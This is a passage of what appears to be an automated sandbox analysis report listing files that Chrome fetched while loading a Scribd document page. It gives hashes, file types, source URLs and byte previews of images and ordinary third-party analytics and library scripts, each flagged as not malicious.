                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1527FBCFD442BA9983615EDAA510BD04A6D4199C05D51186988CBAA5AA5D8617C2481A4CF58536002FAB30520111F2455EF84844FBED1358E81F819FDF11EF3F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......h......P.{..t.IDATx..kl.e...(.E@..(.`...!@....&Dq.eg.. ...HM..A......% .*03.PAf..R/(...#1)./.5.oQ.D.E.....CKw...ew...$o&iH..w...!... ....G1.[C..X1.M.n....k........b.....0?...N............%.=g..nSM{.bX...6..!.rs.b..+.....{.'...H.'...7..O....$>.qz......q...d.6D.........i......K.Z1..)w.b3.......7..V5'......5...['.%+.rD.b..??...7.gu..<...*......k..(z..gz7..?.6..;....M....EJn%..L...,.U.{.V1.!.W.k.>...h.....s..8..........\(.}.....W....t..'.w...........m.}.........~r.....8....\.;....m..'4....gg".P@..3H1..8...a.WMG!.`. Sf.-C8.l.V.?^Ll.t.UM... ....<..../.Er..I...A:.%v...F...S$.n..^Q.....EF...~..H...,.....P.' ..=.....\....!....W...O.A.......0~.4.,.....-..-.$.....8........-fc....A3.rq}...~[u...|.........../Z.SF....E.;S8!..r.M.&......|..X.S.q!.. ......|....4.L.T8&.....h.&...u\..S..O.D...WM....j...u.i..-..?m.ia/...j:Ub .-....o#.2..+dX..}L.5?..y.g.V..WyxmI......Y.rfF.a....c2@..dFK8c.^.#.x!...y..o.......+ZR..@N.........M.i?D..@..7
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (16508)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16587
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3727480877135205
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:nErRUvhHeys9WfGt7lzt0Xw6zc4rQMC8S6MHgQ:iueys9Wfo8w7AfC8S6MR
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A72F49BE598A8BDFD387525069E9EBE7
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:847DDBA21A8F53131AA130F06B86F6DFD2B52617
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:529C82D905A90BAFFDA513B6CF3F645BC30BDD1EC9DBEE8754A4F577C976719F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E2F4C06665A03C96389CF3865C01A17FEA4E566D68B8FF2772399A3E7D7F561D07BA41B235225442529DBD1D6D504EBC10886F1B3BB2FBFD82A17D1054EACFC5
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/213.76c9ff.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[213],{60164:(e,t,a)=>{a.d(t,{A:()=>c});var n=a(62832),o=a.n(n),r=a(96540),s=a(38979),l=a(11865);function d(e,t,a){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var a=e[Symbol.toPrimitive];if(void 0!==a){var n=a.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:t+""}(t))in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}class c extends r.Component{constructor(e){super(e),d(this,"handleFocus",(()=>{this.setState({focused:!0}),"function"===typeof this.props.onFocus&&this.props.onFocus()})),d(this,"handleBlur",(()=>{this.setState({focused:!1})})),this.state={focused:!1},this.uid=l.Ld}render(){const{children:e,description:t,disabled:a,id:n,labelText:l,labelTextClass:d,name:c,o
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 149 x 198, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):19584
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.985093365286731
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:uBpe5/c1i7x2mDflXP2kBD6EwcV/+FdJKPMnO0uifhRQhek5qa:uPe50+x2a+koYOua6ek9
                                                                                                                                                                                                                                                                                                                                                                                        MD5:BD7563954D115DAD1EE9D6576AC7E7E2
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9BCA77794591EE94EAB812527B196384E51AD175
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9F797D2C543FBED7253CC6976DFE0CD01318E8A04DE4E2CF29AD7FA86E9035CD
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D388C0199265D5A37E33D06EC6BB4CE6076B09EADA0A5C4793D449979F27898609A9073D6B09B2E7EF47EC3EC8594BB8B782ADFE591EAE9872F11D0CC05E8F85
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR..............f2$....gAMA......a.....sRGB.........PLTE.......,...... ........... ...., ., ....,... ............,....., .,..............................................4)........6)..+".......0"%.................%..!...........(..J;....................1$.;..............x..]S/&...@3...........r.......C6.....................+.....h^.me.MAlV..xq.ia....,...( ..sl.....SB..[H..h............. .....F8..VL.*.<......=....m..........:..f....,...R........B5......O?..F:.ri.@4..)8-.......<0.`M...........y`........$.....XN....9,.}v.'..}..{v_.v....... ..{.i...a....zq}d..s0.q:..O.eP.WE.1....................TG.(........e[.aZ.............%.|..\...dW.$......>..u..........sj..s.....|.....*..HA.........S........l.mJ....tg{pm..........KA?>........21,SRMS32.X*....~tzXV.VP.I... .IDATx..V.k..........;....`..cA.......I........./d.^.o..C..t..-co..q.0&.'.."Y.f.._.s.L.a2.^...(..tu.9...w..;...._)*....WP..%......Jor.U.......}.ZO
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:gzip compressed data, truncated
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):27
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.169382490786664
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Ftt4ipq4Wln:XtrxWl
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8C843FFB840DECAC646424269B22D78B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:823D50FAA2E9D2D75CAEC02C2595C953F165F956
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CF5E566DC08016A63E1667A2726699C3ADE378330F8E073CC4632D0D19B9F51E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C0C1F5624728CDBC57F55C77F6D59C53584F74731A25B8C2EC7C8CCE72725C7AB7A1E1266A8940F19E6C018D3E4A6FA36602987E7EC3680CFFE501A44289070C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://pixel-config.reddit.com/pixels/t2_9t33vcn2/config
                                                                                                                                                                                                                                                                                                                                                                                        Preview:...........................
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (930), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):930
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.118473677411452
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:0jHQfOuHh1YiLY3WL3QquM32EhEcx+Ps2P2pCgrsLHOII:0EWpNqycBxWACgrsDOt
                                                                                                                                                                                                                                                                                                                                                                                        MD5:F5EADDB4DFC7E121ABA2112E1CA3EF2D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4C8617E748F288236BA239FE3EB2EE39DA929AA1
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:34A85E78B5402C253C2BC4CF64426C2B6B18601602E8A9A71568139FB3EE6599
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A05791E2B1CEE4945B41F4504EC83DD846995AE70EC9A1882D650A745B13AE8389A8A423ECA56372C216D20029CED76FC76E841CEAE0E1A0B8BB9FD8F364769A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://m.stripe.network/inner.html
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<!doctype html><html><head><meta charset="utf-8"><title>StripeM-Inner</title></head><body><script>!function(){var e=document.createElement("script");e.defer=!0,e.src="out-4.5.44.js",e.onload=function(){var e;window.StripeM&&(e=window.location.hash,/ping=false/.test(e)||(e=(e=e.match(/version=(4|6)/))?e[1]:"4",window.StripeM.p({t:!0,v:e})),e=function(e){if(window.opener||window.parent||window)try{var i=((t=JSON.parse(e.data)).message||t).action,t=t.message?t.message.payload:t;switch(i){case"ping":window.StripeM.p({t:!0,o:{muid:t.muid,sid:t.sid,referrer:t.referrer,url:t.url,title:t.title,v2:t.v2},v:t.version||"4"});break;case"track":if(!t.source||!t.data)return;window.StripeM.b({muid:t.muid,sid:t.sid,url:t.url,source:t.source,data:t.data},t.version||"4")}}catch(e){}},window.addEventListener?window.addEventListener("message",e,!1):window.attachEvent("onMessage",e))},document.body.appendChild(e)}()</script></body></html>
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                                                                                                                                        MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://hexagon-analytics.com/images/265007.gif?tm=74&r=874168399&v=111&cs=UTF-8&h=www.scribd.com&l=en-US&S=5e543256c480ac577d30f76f9120eb74&uu=88cc5efd775d85316f8301f58ee373f&t=Advice%20Notification%20%7C%20PDF&u=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&nm=2&mh=63196a00446a1e285d1992cfe444aa55&np=5&ph=332b72bdb211e34e6e3c24f88d7c393b&sh=1024&sw=1280&cd=24&p=Win32&to=300&d=60&ce=true&tp=0&ol=true&pr=Gecko&ps=20030107&vd=Google%20Inc.&hc=4&je=false&ss=true&ls=true&in=true&db=false&tl=false&tr=false&ts=false&tb=false&ab=false&cf=864980724ce0e4610faf43e7780d8361&fph=487f7b22f68312d2c1bbc93b1aea445b&fsh=1024&fsw=1280&fcd=24&fp=Win32&ftp=0&fhc=4&fss=true&fls=true&fin=true&fvch=487f7b22f68312d2c1bbc93b1aea445b&fad=124.04347527516074&z=z
                                                                                                                                                                                                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4662
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.955712980468341
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:cDTFI7bFr3m6EFW90Y9H5PedGNVGe90+3Bb8EJPRO0BTgR9Dtt8w:z7bB26EwLJoQVMEbbBTo9Byw
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D3B67AB7459668AB272B8CE789671EA6
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:2828BB4A656AF10F57A59B4AA171CB0225EFF462
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:81E008CDCA5B41F69F3C8475D3E2FB4ABC662386E66E2848BCE8E6AD1791B3FF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:40E9D94E76E233A855987596CD0D7F7C02E2E7C1986555AE542D86F0CCBDEBD589BB5EFADA6AB6866843CC60E420F6F1C4B754337D73BFB0E08AB86717FE560E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-2-f.scribdassets.com/img/word_document/224266633/149x198/196f9b9902/1731728881?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFF....WEBPVP8 "...0J...*....>m..G$""!'.,...d.......k).............3.2......?'>nzH.....}..7./.....w.....?....c.A.e.3...w..`...L../.....o}...kYy....^..u..\....`..v.n.._..P.i>....OR..{.y9.............c..>..'=..lP7sZ.......}.I+.(^....8.?.&.....W......N..Y.........?.s.R...J......y.\.......'X.K.Sz.g.Ts...(.....>...GY.O.%.[...<..r.z..v.89B?6../.".xWT..j.........BW.P.Fo..B.....F....8.6r....E..B...^c.HY2..;..xq..P....<Z..v .|..D..5#V.m.5G.<3%v...-.u.q.y...X0..q...^.ER......~A...M&-.W....H.y..2.+JP&..G..|XV..+y!k0.M.zH..n..<.LlL....XU.p.C...|^.Z..^.Yz.Z.K.Z.4su.3#..9._...r..1%...G.W..@.....u....... ........:...=...=.....y.o...].Q..d..+....R...wT..l...".hl%:.....h...T..........c.b=Rr....b..1Tk...Gr.|.$6p.........e.._L.j.+.nH.$...:....k.R.27.k....&.^.`.M....L.c...M..7x.....}n....7...........*.5.>..Z,...2...e$6s.Y.l.a=.....L..._.5t.1`E.M......c..Uc.^.sgk.a.?^.N.x......X3.?8.{Vz.F8......a......<k.2....Uz...\...Y....*\.@-.#.g.!..]......1w.mD....?.%:
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):364
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.561528284615616
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:2LGa3ymyCE//MzGCFiM1wBJPwcQK5DrIt6xfeGYqX3OLGhw47Jsr4z+LibIEBE7L:2f3ymyCEIiMRhykgIaOEsrq1EiE7yyyu
                                                                                                                                                                                                                                                                                                                                                                                        MD5:45100DDBE4FB816CA7BA9F16F494964A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B7A62A6E65E6CBF915B895CE14952250387295D9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CCE2184EC089BABC70DED47B8474C543F6A5FF013E4BFD9DBAE8689489BB13BA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:08D730DB7FF2E5EE9BEF496CAC3341ECDEC96D579FD034087813FC9CBC87008824EE9577409BCB6002815FD441A7A05EF1B860A6340E59AFEF5181CB2665D674
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(function(w,d,c,k,a,b,t,e) {. var cs = d.currentScript;. if (cs) {. var uo = cs.getAttribute('data-ueto');. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {. w[uo].setUserSignals({'ea': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});. }. }.})(window, document, false, false, false, false, false, false);..
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 43900
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12220
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.984131147153584
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:26MV2PEUWRRI2V6SKbQ5W3YmOCf3OrXT9WVtzcrExwSeSZR4W870E8WqytwpvaJS:+tjRIm6SoITu3khUSyWW870EYyqpC3gf
                                                                                                                                                                                                                                                                                                                                                                                        MD5:1A001F3A066BFF47A766099B87253911
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8D12FD5ADAE663DFE3313A9043507B1CC16D05D3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C7B10F3B560AC311560E25F7D3867C8C60D19DEF8E3135D679DBF059209D5B86
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6FE356145DE353396FF473453BE526A3F902CC45CA9E99BA6530134CA4D1695614D96402FBB0DE099E16E1F9B422CA6AAF1F11164BE17758ECFA799318C5004E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://www.redditstatic.com/ads/pixel.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:...........;ks.....n..i....k\....<.L..J..P"$F.q....{.%....;;.6.B.}N.w.>.....I.0(E*F.J..t$T=4......yc....J...T.4..%......."\..F......d..%...U52..c+>F..f..JV...... ......."tW>..[.x....L.Q.P.u't..\]wF..w=.._.z....Boi...'.c.FIl<m6M..]u.;..K....F..'.Y.R........AK.M..3.c.N.....D....yf..&...Y2oz......uS..Q.j.]&$...8[.i..6cT..L5.....#..Q.&hj;I.=6I.L.^,F..v;z\&...S4.....N.h...|.].@..D..B.=a..pz.P.....e.5...vQ....G~.fK...2..A.r9ko...ihO...R...[-...}.=.T.39O!.3"....(.....C.....q...8.E..6..*.}..]t.D...'gN.;.2.>....k.+.S)D.....0...".Q.i.,./r.(....Nn.Tmhz.m.Kx]Zj....y.<...;.D.r..H...U....@%.Kb...W.V.{..`i......._...'.!)5.CGd.....e.+^...E.8.Q..d.....4.#...|_.7.UCm..I{.{.f['...`..c:mBjMp......N..F..1.>*. YR...N....~te.B.}n....M..q.<...x.....N:.6.....CT..+^.1........!;...8....P..d+>.q",3..qW.....qb....:....C@ey.$..c.D.e..D...-..<...!......$.d...I`sj.;yplf.....<Y.2I.y.L.Du1".K..... gWn.4.2.....l..0ri....I...Q......X.x.}.?.......A.I..).g.a4.....o..-c
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19015)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):19188
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.212814407014048
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:+CbuG4xGNoDic2UjKPafxwC5b/4xQviOJU7QzxzivDdE3pcGdjkd/9jt3B+Kb964:zb4xGmiJfaf7gxQvVU7eziv+cSjknZ3f
                                                                                                                                                                                                                                                                                                                                                                                        MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (22096), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):22096
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.1556985111456
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:BX0ZDdRzUjTFCa4oj2AlF8RrLPrGH/u2d2Cw25f80m92Nfx0K2Z2F2I02Kft0PEM:KZDdpUjwaPSA4gHMAZesNW4kacLi
                                                                                                                                                                                                                                                                                                                                                                                        MD5:4EDDEEC95AFDA969B3D1B2FB970C1EB1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DA4C64223B6FF380F03AE2506DF526C22A9103D9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:42E2DD427DD9F9D45367C880C68289114B7DE56373FF8BDC664EA0FA3CE77880
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2D431F9BDB08263AB0BC0A596F13E35A136318DA42190EC08712FB1CF963A82EC56FD04231084C876F57853F5930E25F65B1F9D451BDDF140134C7C05F89A0C4
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://cdn.pdst.fm/ping.min.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var t={228:t=>{var n=Object.prototype.hasOwnProperty,e="~";function r(){}function o(t,n,e){this.fn=t,this.context=n,this.once=e||!1}function i(t,n,r,i,c){if("function"!=typeof r)throw new TypeError("The listener must be a function");var u=new o(r,i||t,c),a=e?e+n:n;return t._events[a]?t._events[a].fn?t._events[a]=[t._events[a],u]:t._events[a].push(u):(t._events[a]=u,t._eventsCount++),t}function c(t,n){0==--t._eventsCount?t._events=new r:delete t._events[n]}function u(){this._events=new r,this._eventsCount=0}Object.create&&(r.prototype=Object.create(null),(new r).__proto__||(e=!1)),u.prototype.eventNames=function(){var t,r,o=[];if(0===this._eventsCount)return o;for(r in t=this._events)n.call(t,r)&&o.push(e?r.slice(1):r);return Object.getOwnPropertySymbols?o.concat(Object.getOwnPropertySymbols(t)):o},u.prototype.listeners=function(t){var n=e?e+t:t,r=this._events[n];if(!r)return[];if(r.fn)return[r.fn];for(var o=0,i=r.length,c=new Array(i);o<i;o++)c[o]=r[o].fn;return c},u
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (4903), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4903
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.716270177976456
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:YyRkcTyigd08ZQnk8ZtF8Z/F8ZvQOZvNOZ/WOZQZFOZtApBnb3:yeyigd00Qk0tF0/F0vQCvNC/WCQXCtAr
                                                                                                                                                                                                                                                                                                                                                                                        MD5:DD141FD8932670ACCF173E0CEAAB08C4
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4F7F19BE0EBC5A9699109D73B2E47FAA23C4FD0C
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7EBA46CD3C00F27F8ACBE120EFC4E70E9503AC0D458A10A4A87EE58D51FE8331
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:07357E31BC0FB1B8E1CF8AC05691AD446A7CEDD7C8047502690475803BF676A38250E8B4E9DA3BDB94AE2FE97DDA06338CD4BA88DBBA8620BADFEC12687C0708
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/rul/991817613?random=1733522375967&cv=11&fst=1733522375967&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4c40v9178425511z878386455za201zb78386455&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification&hn=www.googleadservices.com&frm=0&tiba=Advice%20Notification%20%7C%20PDF&npa=0&us_privacy=1-N-&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":7776000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s1182281480.1733522361","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1182281480.1733522361\u0026ig_key=1sNHMxMTgyMjgxNDgwLjE3MzM1MjIzNjE!2sZ8oayg!3sAAptDV7I0LIo\u0026tag_eid=44805651","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1s6xeY0Q!2sZ8oayg!3sAAptDV7I0LIo","1i44805651"],"userBiddingSignals":[["763342930","455586519","6655158306","4155187","6486520154"],null,1733522378933120],"ads":[{"renderUrl":"htt
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):375564
